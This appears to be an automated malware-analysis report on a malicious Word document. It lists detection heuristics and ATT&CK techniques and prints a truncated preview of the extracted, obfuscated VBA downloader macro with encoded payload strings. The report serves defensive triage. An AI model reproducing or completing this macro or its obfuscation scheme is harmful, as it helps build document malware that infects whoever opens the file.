MALICIOUS
224
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample is a malicious Office document containing a VBA macro. The macro utilizes AutoOpen and CreateObject, indicating an attempt to execute code upon opening. The presence of 'macros.bas' and the ClamAV signature 'Doc.Malware.Emodldr-10025032-0' strongly suggest this is a downloader or droppper malware. The VBA script's obfuscated nature prevents a confident determination of the exact download URL or execution method.
Heuristics 8
-
ClamAV: Doc.Malware.Emodldr-10025032-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Malware.Emodldr-10025032-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 46750 bytes |
SHA-256: 7a021dd8d94be4e9ec5d4ae9ac92f5f33c8523cc64d0bb8660d56693a17331a3 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 23 long base64-like blob(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "bErwXQAZtiWMv"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "EbWjVhiIOE"
Function qloRdPhUTSRIhj()
On Error Resume Next
Select Case VSzzRS
Case 27469
EFfOd = Hex(82383 - CSng(55132) - 49167 + ChrW(ucSsK))
NwuhH = JFpEw
End Select
zzqGulQaEi = vXdizo("AA2ADYAMwBlADIAOQAxADIAYwBiAGYANAAwADQAYgBiAGUAYQA40l5qoAL", 2, 50)
Select Case AWYjm
Case 79568
NrzAiM = Hex(47296 - CSng(22475) - 57647 + ChrW(wohKu))
AWlGjv = qJhccC
End Select
Select Case FjLUC
Case 93336
ziLas = Hex(12555 - CSng(84933) - 35685 + ChrW(BjWKz))
jlbQfQ = XiczGs
End Select
Fifit = vXdizo("hu6kMwA1AGUAYQAxADIAOQA1ADEAZgBhAGMANwA5ADgANABjADkANAA1AGEAOAAzADIAZAAwADYAYgAzADAA6v", 5, 80)
Select Case izbtB
Case 14241
YMHsWQ = Hex(75044 - CSng(87924) - 10951 + ChrW(ITPCa))
mQrIHc = uAzMiD
End Select
Select Case HdYUS
Case 84831
wVHfA = Hex(91008 - CSng(58621) - 80767 + ChrW(uzhqiq))
lXuJq = hOAIz
End Select
iJHMtCz = vXdizo("%62owAAZABiADUANQA3AGQAYgBlADcAMgBkAGUAOAA3ADkAYgBmAGUANQBlAGUANwBlADIAMABjAGQAYwAxAGIAOQBhAGQAZAAwADIAZAA4ADkAZQAxADEAZABmAGUAMgAxADcAMQA2AGIANAAxAk.", 6, 143)
Select Case WvfjB
Case 41787
ozwlB = Hex(36680 - CSng(95568) - 5581 + ChrW(riYaQ))
mzYiK = ntirvM
End Select
Select Case mVIWd
Case 49566
afkKkh = Hex(91369 - CSng(40802) - 92182 + ChrW(NmtcO))
fTqJDQ = WmcGZ
End Select
EqdvpVwvZ = vXdizo("AU1PJsDEAMgAwAGMAYwAwADAAZABlAGMAMABhEw", 7, 31)
Select Case QKjnRF
Case 39902
JHGntz = Hex(94729 - CSng(72979) - 69861 + ChrW(oXtcDn))
pJbNY = bWifJ
End Select
Select Case zhPpc
Case 90603
ZnOiW = Hex(94381 - CSng(44341) - 53845 + ChrW(SJHodP))
fzqiv = wFjHv
End Select
JhwiJzu = vXdizo("%O6X.OQBkADIANAA0ADAANwA4AGMAMABjAGEAOQA4ADkAZAA2ADUANgA5MZjj", 6, 52)
Select Case KmzzGZ
Case 50884
XihGaV = Hex(64237 - CSng(23931) - 14535 + ChrW(MvhNjp))
MGZpIw = BfRzU
End Select
Select Case VlMpmu
Case 99664
pzFZk = Hex(73956 - CSng(60976) - 6896 + ChrW(BrrjM))
XqKVJ = FXsWn
End Select
NtzNuQs = vXdizo("mLP2GUANgAzADcAMgAyADUANgBkADQAZQBjADgANAA1ADIAOAA0ADIANQBjAGUAZgBiADMAZA2Xm", 5, 69)
Select Case aiRKGT
Case 55728
CYnmwO = Hex(92768 - CSng(35654) - 91247 + ChrW(HzJPo))
bZptjZ = DzLFV
End Select
Select Case jbwhs
Case 28667
lvdnUu = Hex(8817 - CSng(3455) - 57082 + ChrW(RHsbY))
HKFdXK = WMTiKL
End Select
HmtqzwIh = vXdizo("OYwAyADEANAAwADQAMwBkADQANAA1ADUAYQBlADkAOQAxADcAOAAwADgAYgBiADgANQAzADMAYgAzADEAZAAxAGIAYwA1ADEAZARLMIq", 2, 98)
Select Case BsXoi
Case 56353
tdtLC = Hex(86205 - CSng(18715) - 28308 + ChrW(LYHnoX))
lbaQGa = MuqHT
End Select
Select Case InfTH
Case 98361
OdjdZ = Hex(89117 - CSng(21531) - 13 + ChrW(uSudK))
ltSzcR = vsYCMR
End Select
aDUBAMMbsH = vXdizo("AzGQAMAA2A@BRtDsq", 3, 8)
Select Case odilS
Case 86640
VCbOV = Hex(58905 - CSng(93880) - 99171 + ChrW(jMufBl))
KWzjh = EXhtzh
End Select
Select Case PIRww
Case 13300
AzkXS = Hex(40680 - CSng(71206) - 73389 + ChrW(mfITwz))
YalGi = UwrXq
End Select
aCaWwXRbVjo = vXdizo("DqOGUAMgBjAGQAZgA0ADMAOQAwADkAZgA3ADYAYwBhADgAOQAzAGQAZQA1AGEA' |ConveRtto-SEcUrESTrINg -ke 111,232,165,20,176,188,237,179,61,SqD@a", 4, 124)
Select Case UWPvlz
Case 44013
IOiJUj = Hex(35754 - CSng(49591) - 70442 + ChrW(WRPGtV))
Aabdl = uiERXW
End Select
Select Case NCtPwX
Case 1901
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.